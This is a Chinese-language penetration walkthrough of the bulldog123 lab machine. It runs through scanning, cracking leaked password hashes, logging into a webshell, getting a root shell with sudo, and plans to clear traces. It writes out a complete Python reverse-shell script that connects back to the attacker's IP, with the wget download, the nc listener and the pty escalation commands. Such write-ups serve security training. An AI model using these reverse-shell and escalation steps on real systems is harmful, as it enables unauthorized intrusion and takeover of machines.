bulldog123靶机渗透
实验环境:
攻击机:Kali(192.168.150.129)
靶机:bulldog123(未知)
思路:
信息收集=>寻找漏洞=>利用漏洞反弹shell=>提权至root=>清理痕迹
主机发现:(netdiscover)
被动监听netdiscover -p
主动扫描:netdiscover -i eth0 -r 192.168.150.0/24
端口扫描(masscan):
masscan --rate=10000 -p 0-65535 192.168.150.132,#rate=10000设置发包数
得到开放端口为8080,23,80
(会发现,端口和服务不对应,这是正常现象,还要进一步端口服务扫描)
端口服务扫描:
nmap -T4 -sV -O -p 8080,23,80 192.168.150.132
-T4 扫描速度(1-5速度,5易发生风暴) -V版本 -O系统
在这里插入图片描述
暂无结果
进入目录/dev寻找有用信息
得到以下信息:1.系统上已启用SSH。当我们过渡到使用Web-Shell(专有Shell界面)时,将立即关闭此功能。2.有一个需要验证身份的webshell,/admin的登录界面成功登录,即身份验证成功则可进webshell
翻译:
团队负责人:[email protected]
备用团队负责人:[email protected]
前端:[email protected]
前端:[email protected]
后端:[email protected]
后端:[email protected]
资料库:[email protected]
注意有员工信息,收集
/dev界面查看源码,看到哈希hash,用somd5解密至明文
得ddf45997a7e18a25ad5f5cf222da64814dd060d5的明文为bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e的明文为bulldoglover
其他都没解密成功
分别对应:
后端:[email protected]
资料库:[email protected]
试验用户名为[email protected]或nick及密码
尝试登陆
(可将解密到的东西放入一个txt文件里,用burp进行组合**)
用户名nick和密码bulldog登录成功,但无法修改密码
去另一个点-webshell(登录成功即身份验证成功,所以可进入webshell了)
成功进入webshell且发现可以输入命令,尝试利用命令执行漏洞来获取反弹shell
去kali的网站根目录写shell.py脚本,使脚本执行后可以主动连接kali的某个端口并弹出shell进行提权。其中,shell.py内容为
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((‘192.168.150.129’,1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([’/bin/bash’,’-i’])
打开一个简易的http服务(在哪个目录下开启http服务,操作的就是那个目录下的文件)
python -m SimpleHTTPServer 80
获取kali的shell脚本文件 (脚本执行后靶机才能主动连接kali)
wget http://192.168.150.129/shell.py
查看上传是否成功
上传成功
开启kali监听: nc -vnlp 1234 (因为shell.py脚本里让靶机连接的是kali的1234端口)
执行脚本命令
连接成功,得到shell
查看内核版本 /etc/issue ,请求被拒绝
进入到home目录下查找文件,寻找密码
(ls -a # -a linux中显示隐藏文件,根据文件名,凭借经验,依次进入)
用strings查看程序里存在的东西,寻找密码
(注:此处无法用cat查看,因为它是程序字符串(乱码)),标出的那块类似密码
去掉H,组合一下:SUPERultimatePASSWORDyouCANTget
翻译即超级终极密码你不可能得到!!
提权
python -c ‘import pty;pty.spawn(“/bin/bash”)’ #打开终端
请求被拒绝,尝试用root身份打开shell
sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
sudo操作密码即SUPERultimatePASSWORDyouCANTget
提权至root成功
清理痕迹。。